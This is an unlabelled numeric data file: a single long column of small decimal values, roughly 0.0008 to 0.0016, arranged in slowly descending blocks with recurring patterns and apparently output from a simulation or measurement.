0.000962997
0.000952144
0.000954218
0.000965076
0.000963003
0.000952205
0.000982696
0.000982697
0.000970207
0.000969656
0.000969656
0.000982701
0.000969652
0.000952086
0.000965136
0.000964566
0.000952089
0.00095209
0.000965134
0.000965135
0.000952086
0.000965139
0.00096977
0.000982643
0.000980566
0.000971777
0.000982584
0.000969713
0.000971785
0.000969664
0.000982693
0.000982683
0.000969656
0.000969768
0.00098057
0.000982639
0.000971777
0.000982583
0.000971788
0.000969709
0.000965122
0.000952093
0.000965136
0.000952107
0.000965018
0.000962995
0.000952146
0.00095422
0.00096508
0.000963003
0.000952206
0.000965122
0.000952093
0.000965132
0.000952105
0.000965017
0.000962996
0.000954221
0.000952147
0.000963005
0.000965076
0.000952205
0.00096967
0.000982697
0.000982688
0.000969659
0.000969771
0.000980563
0.000982644
0.000971773
0.000982584
0.000971781
0.000969709
0.000969671
0.000982696
0.000982689
0.000969655
0.00096502
0.000962992
0.000952145
0.000954212
0.000965081
0.000962994
0.000952208
0.000965127
0.000952092
0.000965135
0.0009521
0.00096502
0.000962994
0.000954217
0.000952143
0.000962998
0.000965077
0.000952206
0.000965127
0.00095209
0.000965131
0.000952098
0.000982696
0.000982699
0.000970206
0.000969656
0.000969656
0.000982702
0.000969651
0.000952088
0.000965137
0.000964567
0.000952093
0.000952089
0.000965134
0.000965134
0.000952086
0.000965137
0.000969767
0.000980565
0.000982639
0.000971778
0.000982583
0.000971783
0.000969708
0.000969662
0.000982697
0.000982684
0.000969655
0.00096966
0.000982694
0.000982685
0.000969652
0.000965014
0.000962997
0.000954218
0.000952146
0.000963001
0.000965077
0.00095221
0.000965017
0.000962995
0.000954215
0.000952145
0.000962999
0.000965076
0.000952207
0.000965119
0.000952093
0.000965131
0.000952106
0.00096512
0.000952091
0.000965129
0.000952105
0.000982701
0.000969649
0.0009827
0.000969648
0.000964567
0.000952089
0.000952089
0.000965132
0.000965131
0.000952085
0.000965135
0.000952085
0.000965135
0.000947572
0.000934519
0.000947573
0.000934522
0.000947567
0.00094757
0.000935077
0.000934523
0.000934525
0.000916951
0.000930005
0.000916955
0.000930006
0.000929437
0.000916957
0.000916958
0.000930003
0.000930003
0.000934539
0.000947566
0.000947556
0.000934526
0.000934637
0.000947511
0.000945438
0.00093665
0.00094745
0.000934579
0.000936654
0.000934638
0.000947511
0.000945435
0.000936646
0.00094745
0.000934581
0.000936651
0.000929991
0.000916956
0.00093
0.000916967
0.000929994
0.000916959
0.000930002
0.000916966
0.000929886
0.000927866
0.000917011
0.000919088
0.000929946
0.00092787
0.000917074
0.000929888
0.000927862
0.000917013
0.000919084
0.000929948
0.000927866
0.000917075
0.000947566
0.000947565
0.000935075
0.000934523
0.000934521
0.000947569
0.000934517
0.000916952
0.000930005
0.000929435
0.000916956
0.000916955
0.000930002
0.000929999
0.000916951
0.000930003
0.000934637
0.000947512
0.000945437
0.00093665
0.000947453
0.000934579
0.000936655
0.000934536
0.000947567
0.000947558
0.000934527
0.000934638
0.000945439
0.000947513
0.000936648
0.000947452
0.000936655
0.00093458
0.000929991
0.000916961
0.000930001
0.00091697
0.000929884
0.000927867
0.000917012
0.000919088
0.000929945
0.000927871
0.000917074
0.000929993
0.000916961
0.000930002
0.000916972
0.000929885
0.000927865
0.000919089
0.000917014
0.000927872
0.000929945
0.000917074
0.000934531
0.000947563
0.000947554
0.000934522
0.000934632
0.000945435
0.000947509
0.000936645
0.000947451
0.000936653
0.000934574
0.000934532
0.000947563
0.000947553
0.000934523
0.000929879
0.000927866
0.000917013
0.000919089
0.000929942
0.000927872
0.000917073
0.000929985
0.000916957
0.000929997
0.000916969
0.000929881
0.000927863
0.000919088
0.00091701
0.000927871
0.000929942
0.000917072
0.000929987
0.000916958
0.000929999
0.000916967
0.00094757
0.000947569
0.000935076
0.000934525
0.000934523
0.000947572
0.00093452
0.000916956
0.000930008
0.000929435
0.000916959
0.000916959
0.000930001
0.000930003
0.000916955
0.000930006
0.000934634
0.000945432
0.000947512
0.000936647
0.000947452
0.00093665
0.000934577
0.000934537
0.000947569
0.000947561
0.000934524
0.000934539
0.000947566
0.00094756
0.000934524
0.000929881
0.000927866
0.000919087
0.000917014
0.000927869
0.000929945
0.000917078
0.000929884
0.000927865
0.000919086
0.000917014
0.000927868
0.000929944
0.000917077
0.000929991
0.000916963
0.00093
0.000916972
0.000929993
0.000916959
0.000929999
0.000916969
0.00094757
0.000934518
0.000947571
0.000934518
0.000929436
0.000916956
0.000916959
0.000929999
0.00093
0.000916952
0.000930004
0.000916955
0.000930004
0.000912437
0.000899386
0.000912441
0.000899387
0.000912435
0.000912436
0.000899945
0.00089939
0.000899391
0.000881823
0.000894872
0.000881821
0.000894871
0.000894304
0.000881828
0.000881826
0.000894871
0.000894869
0.000899403
0.000912432
0.000912421
0.000899396
0.000899506
0.000912378
0.000910306
0.000901518
0.000912322
0.000899446
0.000901522
0.000899505
0.00091238
0.000910303
0.000901518
0.000912321
0.000899448
0.000901522
0.00089486
0.000881828
0.000894868
0.00088184
0.000894858
0.000881828
0.000894873
0.00088184
0.000894755
0.000892735
0.000881883
0.000883954
0.000894815
0.000892738
0.000881943
0.000894753
0.000892735
0.000881881
0.000883956
0.000894814
0.000892739
0.000881942
0.000912432
0.000912431
0.000899945
0.000899394
0.000899393
0.000912436
0.000899389
0.000881824
0.000894878
0.000894305
0.000881827
0.00088183
0.000894873
0.000894871
0.000881826
0.000894874
0.000899505
0.000912379
0.000910306
0.000901517
0.00091232
0.000899446
0.000901523
0.000899404
0.000912436
0.000912427
0.000899396
0.000899507
0.000910305
0.00091238
0.000901512
0.00091232
0.000901522
0.00089945
0.000894859
0.000881827
0.000894867
0.000881838
0.000894755
0.000892735
0.00088188
0.000883957
0.000894813
0.00089274
0.000881943
0.000894858
0.000881829
0.000894872
0.000881839
0.000894755
0.000892729
0.000883956
0.000881882
0.00089274
0.000894816
0.000881942
0.000899403
0.000912431
0.000912425
0.000899394
0.000899503
0.000910303
0.000912377
0.000901514
0.000912319
0.000901522
0.000899445
0.0008994
0.000912432
0.000912426
0.000899391
0.000894756
0.000892734
0.000881885
0.000883955
0.000894812
0.000892737
0.000881946
0.00089486
0.000881833
0.000894869
0.000881843
0.000894753
0.000892733
0.000883956
0.000881882
0.000892738
0.000894813
0.000881944
0.000894857
0.000881829
0.000894868
0.000881841
0.000912436
0.000912436
0.000899945
0.000899393
0.000899393
0.00091244
0.000899388
0.000881824
0.000894876
0.000894304
0.000881829
0.000881826
0.000894872
0.000894871
0.000881822
0.000894873
0.000899507
0.000910302
0.000912382
0.000901512
0.000912322
0.000901517
0.000899449
0.0008994
0.000912436
0.000912428
0.000899394
0.000899401
0.000912436
0.000912425
0.000899396
0.000894752
0.000892736
0.000883957
0.000881884
0.000892738
0.000894814
0.000881949
0.000894754
0.000892732
0.000883954
0.000881882
0.000892734
0.000894815
0.000881944
0.000894854
0.000881829
0.000894867
0.000881844
0.000894857
0.000881829
0.000894869
0.00088184
0.000912437
0.000899385
0.00091244
0.000899392
0.000894304
0.000881828
0.000881827
0.000894869
0.000894872
0.000881824
0.000894873
0.000881824
0.000894876
0.000877309
0.000864256
0.000877307
0.000864256
0.000877306
0.000877304
0.000864813
0.00086426
0.000864259
0.000846689
0.000859742
0.000846692
0.000859742
0.000859173
0.000846694
0.000846695
0.00085974
0.000859739
0.000864276
0.000877302
0.000877294
0.000864263
0.000864376
0.000877252
0.00087517
0.000866384
0.000877189
0.000864315
0.000866388
0.000864377
0.000877248
0.000875173
0.000866384
0.00087719
0.000864316
0.000866388
0.000859729
0.000846695
0.000859736
0.000846706
0.000859731
0.000846694
0.000859737
0.000846708
0.000859624
0.000857602
0.000846749
0.000848824
0.000859682
0.000857606
0.00084681
0.000859625
0.000857602
0.000846749
0.000848823
0.000859683
0.000857605
0.000846809
0.000877305
0.000877306
0.000864813
0.000864261
0.000864263
0.00087731
0.00086426
0.000846688
0.000859743
0.000859171
0.000846694
0.000846694
0.00085974
0.000859742
0.000846691
0.000859746
0.000864375
0.000877248
0.000875175
0.000866387
0.00087719
0.000864315
0.000866393
0.000864272
0.000877302
0.000877293
0.000864264
0.000864375
0.000875176
0.000877248
0.000866388
0.000877189
0.000866394
0.000864317
0.000859728
0.000846698
0.000859737
0.00084671
0.000859624
0.000857604
0.000846751
0.000848826
0.000859682
0.00085761
0.000846813
0.000859728
0.000846699
0.000859739
0.000846709
0.000859623
0.000857607
0.000848828
0.000846752
0.000857611
0.000859683
0.000846812
0.000864274
0.000877306
0.000877297
0.000864265
0.000864375
0.000875175
0.000877249
0.000866382
0.000877191
0.000866391
0.000864319
0.000864275
0.000877304
0.000877297
0.000864264
0.000859623
0.000857598
0.000846752
0.000848825
0.000859685
0.000857605
0.000846814
0.00085973
0.000846696
0.000859739
0.00084671
0.000859624
0.000857598
0.000848826
0.000846751
0.000857607
0.000859687
0.000846813
0.000859732
0.000846699
0.000859739
0.00084671
0.000877304
0.000877306
0.000864815
0.000864265
0.000864265
0.000877308
0.00086426
0.000846695
0.000859745
0.000859174
0.000846698
0.000846698
0.000859742
0.000859744
0.000846695
0.000859746
0.000864374
0.000875175
0.000877249
0.000866387
0.000877191
0.000866394
0.000864315
0.000864273
0.000877306
0.0008773
0.000864265
0.000864272
0.000877301
0.000877297
0.000864263
0.000859626
0.000857603
0.000848827
0.000846755
0.000857608
0.000859688
0.000846817
0.000859624
0.000857604
0.000848828
0.000846752
0.00085761
0.000859684
0.000846815
0.000859731
0.0008467
0.000859741
0.000846713
0.000859734
0.000846701
0.000859741
0.000846711
0.000877309
0.000864258
0.000877307
0.000864257
0.000859174
0.000846698
0.000846699
0.000859741
0.000859742
0.000846694
0.000859743
0.000846696
0.000859744
0.000842175
0.000829127
0.000842178
0.000829128
0.000842172
0.000842174
0.000829683
0.00082913
0.000829132
0.000811563
0.000824613
0.000811567
0.000824615
0.000824044
0.000811568
0.00081157
0.00082461
0.000824611
0.000829135
0.000842167
0.00084216
0.00082913
0.000829244
0.000842117
0.000840042
0.000831253
0.000842056
0.000829184
0.00083126
0.000829241
0.000842115
0.000840043
0.000831255
0.000842056
0.000829184
0.000831262
0.000824594
0.000811568
0.000824608
0.000811577
0.000824593
0.000811567
0.000824606
0.000811576
0.000824491
0.000822472
0.00081162
0.000813696
0.000824552
0.000822478
0.00081168
0.000824489
0.000822472
0.00081162
0.000813696
0.000824552
0.000822479
0.000811679
0.00084217
0.00084217
0.000829682
0.00082913
0.000829132
0.000842175
0.000829127
0.00081156
0.000824612
0.000824042
0.000811563
0.000811567
0.000824609
0.000824609
0.000811561
0.000824612
0.000829246
0.000842119
0.000840044
0.000831257
0.000842059
0.000829188
0.000831261
0.000829151
0.000842174
0.000842166
0.000829137
0.000829247
0.000840046
0.000842119
0.000831258
0.00084206
0.000831262
0.00082919
0.000824604
0.000811573
0.00082461
0.000811581
0.000824496
0.000822475
0.000811625
0.000813698
0.000824555
0.000822478
0.000811687
0.000824606
0.000811572
0.000824614
0.000811582
0.000824498
0.000822475
0.000813696
0.000811626
0.000822477
0.000824558
0.000811687
0.00082914
0.00084217
0.000842163
0.000829133
0.000829239
0.000840044
0.000842118
0.000831257
0.00084206
0.000831261
0.000829184
0.000829139
0.000842174
0.000842161
0.000829131
0.000824489
0.000822473
0.00081162
0.000813696
0.000824551
0.000822478
0.000811684
0.000824596
0.000811566
0.000824607
0.000811577
0.000824489
0.000822475
0.000813695
0.00081162
0.000822477
0.000824552
0.000811682
0.000824595
0.000811569
0.000824607
0.000811577
0.000842174
0.000842177
0.000829686
0.000829135
0.000829135
0.000842181
0.000829131
0.000811565
0.000824618
0.000824046
0.00081157
0.000811567
0.000824614
0.000824614
0.000811564
0.000824617
0.000829246
0.000840046
0.000842119
0.000831256
0.00084206
0.000831264
0.000829184
0.000829138
0.000842175
0.000842167
0.000829136
0.000829137
0.000842175
0.000842165
0.000829129
0.000824491
0.000822476
0.000813697
0.000811624
0.00082248
0.000824556
0.000811684
0.000824492
0.000822474
0.000813697
0.000811621
0.000822481
0.000824551
0.000811683
0.000824595
0.00081157
0.000824613
0.000811584
0.000824596
0.000811567
0.000824606
0.000811583
0.000842179
0.000829126
0.00084218
0.000829124
0.000824046
0.000811567
0.000811566
0.000824609
0.000824607
0.000811563
0.000824612
0.000811562
0.000824611
0.000807049
0.000793998
0.000807053
0.000794001
0.000807047
0.000807049
0.000794556
0.000794002
0.000794005
0.000776436
0.000789485
0.000776438
0.000789486
0.000788916
0.000776439
0.000776442
0.000789482
0.000789482
0.000794013
0.000807043
0.000807032
0.000794004
0.000794114
0.000806987
0.000804914
0.000796127
0.000806927
0.000794056
0.000796131
0.000794113
0.000806988
0.000804913
0.000796125
0.000806926
0.000794056
0.000796131
0.000789468
0.000776442
0.000789479
0.000776456
0.000789468
0.000776441
0.00078948
0.000776454
0.000789362
0.000787346
0.000776494
0.000778568
0.000789424
0.000787349
0.000776557
0.000789361
0.000787344
0.000776493
0.000778569
0.000789423
0.00078735
0.000776558
0.000807042
0.000807042
0.000794554
0.000794002
0.000794001
0.000807045
0.000793996
0.000776435
0.000789485
0.000788913
0.000776438
0.000776441
0.000789481
0.00078948
0.000776437
0.000789484
0.00079412
0.000806994
0.000804916
0.000796126
0.000806933
0.00079406
0.000796134
0.000794014
0.000807046
0.000807035
0.000794005
0.000794118
0.000804917
0.000806992
0.000796132
0.000806933
0.000796137
0.000794059
0.000789473
0.000776444
0.000789482
0.000776455
0.000789368
0.000787346
0.000776498
0.00077857
0.000789428
0.000787351
0.000776561
0.000789472
0.000776444
0.000789482
0.000776457
0.000789367
0.000787349
0.000778573
0.000776498
0.000787354
0.000789427
0.000776561
0.000794014
0.000807039
0.000807032
0.000794001
0.000794114
0.000804913
0.000806988
0.000796126
0.000806929
0.000796131
0.000794056
0.000794014
0.000807042
0.000807033
0.000794003
0.000789365
0.000787345
0.000776497
0.000778564
0.000789424
0.000787347
0.000776564
0.000789471
0.000776443
0.000789479
0.000776454
0.000789365
0.000787344
0.000778568
0.000776498
0.000787348
0.000789425
0.000776562
0.00078947
0.000776444
0.000789482
0.000776455
0.000807048
0.000807047
0.000794559
0.000794004
0.000794002
0.000807051
0.000793999
0.000776439
0.000789489
0.000788917
0.000776443
0.000776443
0.000789485
0.000789481
0.000776438
0.000789485
0.000794113
0.000804915
0.000806989
0.000796125
0.00080693
0.000796132
0.000794058
0.000794013
0.000807046
0.000807037
0.000794003
0.000794013
0.000807045
0.000807036
0.000794006
0.000789363
0.000787349
0.00077857
0.000776498
0.000787351
0.000789425
0.000776562
0.000789363
0.000787344
0.000778569
0.0007765
0.00078735
0.000789427
0.00077656
0.000789468
0.000776444
0.000789478
0.00077646
0.000789468
0.000776445
0.000789485
0.000776457
0.000807048
0.000793998
0.000807049
0.000794001
0.000788915
0.000776444
0.000776443
0.000789482
0.000789484
0.000776439
0.000789486
0.00077644
0.000789489
0.0016408
0.00163652
0.00163653
0.00164079
0.0016408
0.00164079
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.0016408
0.00163652
0.00164079
0.0016408
0.00163652
0.00164532
0.00164534
0.0016496
0.00164959
0.00164532
0.00164533
0.0016496
0.00164532
0.0016408
0.00164081
0.00163654
0.00163652
0.00164079
0.0016408
0.00164081
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.00164081
0.00163652
0.0016408
0.00164081
0.00163652
0.00164532
0.00164534
0.00164959
0.00164961
0.00164534
0.00164532
0.00164961
0.00164533
0.0016408
0.00164081
0.00163652
0.00163652
0.00164081
0.00164081
0.00163652
0.00164536
0.00164955
0.00164533
0.0016496
0.0016454
0.00164533
0.00164958
0.00164536
0.00164955
0.00164533
0.0016496
0.0016454
0.00164533
0.00164958
0.00164077
0.00163653
0.0016408
0.00163661
0.00164075
0.0016408
0.00163656
0.00164077
0.00163653
0.0016408
0.00163661
0.00164075
0.0016408
0.00163657
0.00164531
0.00164961
0.00164961
0.00164532
0.00164532
0.00164961
0.00160565
0.00160563
0.00160137
0.00160139
0.00160565
0.00160563
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161017
0.00161443
0.00161441
0.00161443
0.00161015
0.00161017
0.00160565
0.00160137
0.00160563
0.00160565
0.00160137
0.00161016
0.00160564
0.00160565
0.00160563
0.00160138
0.00160137
0.00160563
0.00160564
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161017
0.00161442
0.00161443
0.00161443
0.00161017
0.00161015
0.00160565
0.00160137
0.00160563
0.00160565
0.00160137
0.00161016
0.00160564
0.00160566
0.00160137
0.00160137
0.00160565
0.00160565
0.00160137
0.0016102
0.00161437
0.00161442
0.00161016
0.0016144
0.00161024
0.00161017
0.0016102
0.00161438
0.00161442
0.00161017
0.0016144
0.00161024
0.00161017
0.00161015
0.00161444
0.00161444
0.00161444
0.00161015
0.00161015
0.00160562
0.00160138
0.00160564
0.00160146
0.00160559
0.00160564
0.00160141
0.00160562
0.00160139
0.00160564
0.00160145
0.00160559
0.00160564
0.00160141
0.00157053
0.00157052
0.00156626
0.00156628
0.00157053
0.00157052
0.00156626
0.00157504
0.00157931
0.00157505
0.00157931
0.00157504
0.00157504
0.00157506
0.00157931
0.0015793
0.00157931
0.00157504
0.00157505
0.00157054
0.00156626
0.00157053
0.00157053
0.00156626
0.00157504
0.00157053
0.00157053
0.00157051
0.00156627
0.00156626
0.00157052
0.00157053
0.00156626
0.00157503
0.00157931
0.00157504
0.00157931
0.00157503
0.00157503
0.00157505
0.00157929
0.0015793
0.0015793
0.00157505
0.00157503
0.00157053
0.00156626
0.00157053
0.00157053
0.00156626
0.00157504
0.00157053
0.00157055
0.00156627
0.00156627
0.00157055
0.00157055
0.00156627
0.00157509
0.00157925
0.00157931
0.00157505
0.00157928
0.00157512
0.00157506
0.00157508
0.00157925
0.00157931
0.00157505
0.00157928
0.00157512
0.00157506
0.00157504
0.00157932
0.00157932
0.00157932
0.00157504
0.00157504
0.00157051
0.00156628
0.00157053
0.00156635
0.00157048
0.00157053
0.00156631
0.00157051
0.00156628
0.00157054
0.00156635
0.00157048
0.00157053
0.00156631
0.00153545
0.00153543
0.00153118
0.0015312
0.00153545
0.00153544
0.00153118
0.00153995
0.00154422
0.00153996
0.00154422
0.00153995
0.00153995
0.00153997
0.00154422
0.00154421
0.00154422
0.00153995
0.00153997
0.00153546
0.00153119
0.00153545
0.00153545
0.00153119
0.00153997
0.00153546
0.00153545
0.00153544
0.0015312
0.00153119
0.00153544
0.00153545
0.00153118
0.00153995
0.00154422
0.00153997
0.00154422
0.00153995
0.00153995
0.00153997
0.00154421
0.00154422
0.00154422
0.00153997
0.00153995
0.00153546
0.00153119
0.00153545
0.00153546
0.00153119
0.00153996
0.00153546
0.00153547
0.00153119
0.00153119
0.00153547
0.00153547
0.00153119
0.00154
0.00154417
0.00154422
0.00153997
0.0015442
0.00154003
0.00153998
0.00154
0.00154416
0.00154422
0.00153997
0.0015442
0.00154003
0.00153997
0.00153996
0.00154424
0.00154424
0.00154424
0.00153996
0.00153996
0.00153543
0.00153121
0.00153546
0.00153127
0.0015354
0.00153545
0.00153123
0.00153543
0.0015312
0.00153545
0.00153126
0.0015354
0.00153545
0.00153123
0.00150038
0.00150036
0.00149611
0.00149612
0.00150038
0.00150036
0.00149611
0.00150488
0.00150915
0.00150489
0.00150915
0.00150488
0.00150488
0.0015049
0.00150915
0.00150913
0.00150915
0.00150488
0.0015049
0.00150038
0.00149611
0.00150037
0.00150038
0.00149611
0.00150489
0.00150038
0.00150037
0.00150036
0.00149612
0.00149611
0.00150036
0.00150037
0.00149611
0.00150488
0.00150914
0.00150488
0.00150915
0.00150487
0.00150487
0.0015049
0.00150913
0.00150915
0.00150915
0.00150489
0.00150488
0.00150038
0.00149611
0.00150036
0.00150038
0.00149611
0.00150489
0.00150038
0.0015004
0.00149612
0.00149611
0.00150039
0.00150039
0.00149611
0.00150493
0.00150909
0.00150915
0.0015049
0.00150913
0.00150496
0.0015049
0.00150493
0.00150909
0.00150915
0.0015049
0.00150913
0.00150496
0.0015049
0.00150488
0.00150917
0.00150916
0.00150917
0.00150489
0.00150488
0.00150036
0.00149613
0.00150038
0.00149619
0.00150032
0.00150038
0.00149616
0.00150036
0.00149613
0.00150038
0.00149619
0.00150032
0.00150038
0.00149616
0.0014653
0.00146528
0.00146104
0.00146105
0.0014653
0.00146529
0.00146103
0.0014698
0.00147407
0.00146981
0.00147408
0.0014698
0.0014698
0.00146982
0.00147407
0.00147406
0.00147407
0.0014698
0.00146982
0.0014653
0.00146103
0.00146529
0.0014653
0.00146104
0.00146981
0.0014653
0.00146531
0.00146529
0.00146105
0.00146104
0.00146529
0.00146531
0.00146104
0.00146981
0.00147408
0.00146981
0.00147408
0.00146981
0.00146981
0.00146983
0.00147406
0.00147407
0.00147408
0.00146982
0.00146981
0.00146531
0.00146104
0.0014653
0.00146531
0.00146104
0.00146981
0.0014653
0.0014653
0.00146102
0.00146102
0.0014653
0.0014653
0.00146102
0.00146984
0.00147401
0.00147406
0.00146981
0.00147404
0.00146987
0.00146981
0.00146983
0.001474
0.00147406
0.00146981
0.00147404
0.00146987
0.00146981
0.00146979
0.00147407
0.00147407
0.00147408
0.00146979
0.00146979
0.00146526
0.00146104
0.00146529
0.0014611
0.00146523
0.00146529
0.00146106
0.00146526
0.00146104
0.00146529
0.0014611
0.00146524
0.00146529
0.00146106
0.00143023
0.00143021
0.00142596
0.00142597
0.00143023
0.00143022
0.00142596
0.00143473
0.001439
0.00143474
0.001439
0.00143473
0.00143473
0.00143475
0.001439
0.00143899
0.001439
0.00143473
0.00143475
0.00143023
0.00142596
0.00143022
0.00143023
0.00142596
0.00143473
0.00143022
0.00143023
0.00143021
0.00142597
0.00142596
0.00143021
0.00143023
0.00142596
0.00143473
0.001439
0.00143474
0.001439
0.00143473
0.00143473
0.00143475
0.00143898
0.001439
0.001439
0.00143474
0.00143473
0.00143023
0.00142596
0.00143022
0.00143023
0.00142596
0.00143473
0.00143022
0.00143023
0.00142595
0.00142595
0.00143022
0.00143022
0.00142594
0.00143476
0.00143892
0.00143898
0.00143473
0.00143895
0.00143479
0.00143473
0.00143476
0.00143892
0.00143898
0.00143473
0.00143895
0.00143479
0.00143473
0.00143471
0.00143899
0.00143899
0.00143899
0.00143472
0.00143472
0.00143018
0.00142596
0.00143021
0.00142602
0.00143015
0.00143021
0.00142598
0.00143018
0.00142596
0.00143021
0.00142602
0.00143015
0.00143021
0.00142598
0.00139515
0.00139513
0.00139088
0.00139089
0.00139514
0.00139513
0.00139087
0.00139964
0.00140391
0.00139965
0.00140392
0.00139964
0.00139964
0.00139966
0.00140391
0.0014039
0.00140392
0.00139965
0.00139966
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.00139965
0.00139514
0.00139514
0.00139512
0.00139089
0.00139088
0.00139513
0.00139514
0.00139088
0.00139964
0.00140391
0.00139965
0.00140391
0.00139964
0.00139964
0.00139966
0.00140389
0.00140391
0.00140391
0.00139966
0.00139965
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.00139965
0.00139514
0.00139515
0.00139087
0.00139087
0.00139515
0.00139514
0.00139086
0.00139967
0.00140384
0.0014039
0.00139965
0.00140387
0.00139971
0.00139965
0.00139967
0.00140384
0.0014039
0.00139965
0.00140387
0.00139971
0.00139965
0.00139963
0.00140391
0.00140392
0.00140392
0.00139964
0.00139964
0.0013951
0.00139088
0.00139514
0.00139094
0.00139507
0.00139513
0.00139091
0.0013951
0.00139088
0.00139513
0.00139094
0.00139507
0.00139513
0.0013909
0.00136007
0.00136005
0.0013558
0.00135581
0.00136007
0.00136005
0.0013558
0.00136457
0.00136883
0.00136458
0.00136884
0.00136456
0.00136457
0.00136458
0.00136884
0.00136882
0.00136884
0.00136457
0.00136458
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00136457
0.00136006
0.00136007
0.00136005
0.00135581
0.0013558
0.00136005
0.00136007
0.0013558
0.00136457
0.00136884
0.00136458
0.00136884
0.00136457
0.00136457
0.00136458
0.00136882
0.00136884
0.00136884
0.00136458
0.00136457
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00136457
0.00136006
0.00136007
0.00135579
0.00135579
0.00136007
0.00136007
0.00135579
0.0013646
0.00136877
0.00136883
0.00136457
0.0013688
0.00136463
0.00136458
0.0013646
0.00136876
0.00136883
0.00136457
0.0013688
0.00136463
0.00136458
0.00136456
0.00136884
0.00136884
0.00136884
0.00136456
0.00136456
0.00136003
0.00135581
0.00136006
0.00135587
0.00136
0.00136006
0.00135583
0.00136003
0.00135581
0.00136006
0.00135587
0.00136
0.00136006
0.00135583
0.00132499
0.00132498
0.00132073
0.00132074
0.00132499
0.00132498
0.00132072
0.00132949
0.00133376
0.0013295
0.00133377
0.00132949
0.00132949
0.00132951
0.00133376
0.00133375
0.00133376
0.0013295
0.00132951
0.00132499
0.00132072
0.00132499
0.00132499
0.00132072
0.00132949
0.00132499
0.001325
0.00132498
0.00132074
0.00132073
0.00132498
0.001325
0.00132073
0.0013295
0.00133376
0.0013295
0.00133376
0.00132949
0.00132949
0.00132951
0.00133374
0.00133376
0.00133376
0.00132951
0.0013295
0.001325
0.00132072
0.00132498
0.001325
0.00132073
0.0013295
0.00132499
0.001325
0.00132072
0.00132072
0.001325
0.001325
0.00132072
0.00132953
0.00133369
0.00133375
0.0013295
0.00133373
0.00132956
0.0013295
0.00132953
0.00133369
0.00133375
0.0013295
0.00133373
0.00132956
0.00132951
0.00132949
0.00133377
0.00133377
0.00133377
0.00132949
0.00132949
0.00132496
0.00132073
0.00132498
0.00132079
0.00132492
0.00132498
0.00132076
0.00132496
0.00132074
0.00132499
0.00132079
0.00132492
0.00132499
0.00132076
0.00128991
0.00128989
0.00128564
0.00128565
0.00128991
0.0012899
0.00128564
0.00129442
0.00129868
0.00129442
0.00129869
0.00129441
0.00129441
0.00129443
0.00129868
0.00129866
0.00129868
0.00129441
0.00129443
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00129441
0.0012899
0.00128991
0.00128989
0.00128565
0.00128564
0.0012899
0.00128991
0.00128564
0.00129441
0.00129868
0.00129442
0.00129869
0.00129441
0.00129441
0.00129443
0.00129867
0.00129868
0.00129869
0.00129443
0.00129441
0.00128991
0.00128564
0.0012899
0.00128991
0.00128564
0.00129442
0.00128991
0.00128992
0.00128563
0.00128563
0.00128991
0.00128991
0.00128563
0.00129444
0.00129861
0.00129867
0.00129442
0.00129865
0.00129448
0.00129442
0.00129444
0.00129861
0.00129867
0.00129442
0.00129865
0.00129448
0.00129442
0.0012944
0.00129869
0.00129869
0.00129869
0.00129441
0.00129441
0.00128987
0.00128565
0.0012899
0.00128571
0.00128984
0.0012899
0.00128567
0.00128987
0.00128565
0.0012899
0.00128571
0.00128984
0.0012899
0.00128567
0.00125483
0.00125481
0.00125056
0.00125057
0.00125482
0.00125481
0.00125055
0.00125933
0.0012636
0.00125933
0.0012636
0.00125932
0.00125933
0.00125934
0.0012636
0.00126358
0.0012636
0.00125933
0.00125934
0.00125482
0.00125055
0.00125481
0.00125482
0.00125055
0.00125933
0.00125482
0.00125483
0.00125481
0.00125056
0.00125056
0.00125481
0.00125483
0.00125055
0.00125933
0.0012636
0.00125933
0.0012636
0.00125933
0.00125933
0.00125935
0.00126358
0.0012636
0.0012636
0.00125934
0.00125933
0.00125483
0.00125055
0.00125481
0.00125482
0.00125055
0.00125933
0.00125482
0.00125483
0.00125054
0.00125054
0.00125482
0.00125482
0.00125054
0.00125936
0.00126352
0.00126359
0.00125933
0.00126356
0.00125939
0.00125933
0.00125936
0.00126353
0.00126359
0.00125933
0.00126356
0.00125939
0.00125933
0.00125932
0.0012636
0.0012636
0.0012636
0.00125932
0.00125932
0.00125478
0.00125056
0.00125481
0.00125062
0.00125475
0.00125481
0.00125058
0.00125478
0.00125056
0.00125481
0.00125062
0.00125475
0.00125481
0.00125058
0.00121973
0.00121971
0.00121546
0.00121547
0.00121973
0.00121971
0.00121546
0.00122423
0.0012285
0.00122424
0.0012285
0.00122423
0.00122423
0.00122425
0.0012285
0.00122849
0.0012285
0.00122423
0.00122424
0.00121973
0.00121546
0.00121972
0.00121973
0.00121546
0.00122423
0.00121972
0.00121973
0.00121971
0.00121547
0.00121546
0.00121971
0.00121973
0.00121546
0.00122423
0.0012285
0.00122424
0.0012285
0.00122423
0.00122423
0.00122425
0.00122849
0.0012285
0.0012285
0.00122425
0.00122423
0.00121973
0.00121546
0.00121972
0.00121973
0.00121546
0.00122424
0.00121972
0.00121973
0.00121545
0.00121545
0.00121973
0.00121973
0.00121545
0.00122426
0.00122843
0.00122849
0.00122424
0.00122846
0.00122429
0.00122424
0.00122426
0.00122843
0.00122849
0.00122423
0.00122846
0.00122429
0.00122424
0.00122422
0.0012285
0.0012285
0.00122851
0.00122422
0.00122422
0.00121969
0.00121546
0.00121972
0.00121552
0.00121965
0.00121972
0.00121549
0.00121969
0.00121546
0.00121972
0.00121552
0.00121965
0.00121971
0.00121548
0.00118463
0.00118461
0.00118036
0.00118037
0.00118463
0.00118461
0.00118035
0.00118913
0.0011934
0.00118914
0.0011934
0.00118913
0.00118913
0.00118915
0.0011934
0.00119339
0.0011934
0.00118913
0.00118915
0.00118463
0.00118035
0.00118462
0.00118462
0.00118036
0.00118913
0.00118462
0.00118463
0.00118461
0.00118037
0.00118036
0.00118461
0.00118463
0.00118036
0.00118913
0.00119341
0.00118914
0.00119341
0.00118913
0.00118913
0.00118915
0.00119339
0.00119341
0.00119341
0.00118915
0.00118913
0.00118463
0.00118035
0.00118462
0.00118463
0.00118036
0.00118914
0.00118462
0.00118463
0.00118035
0.00118035
0.00118463
0.00118463
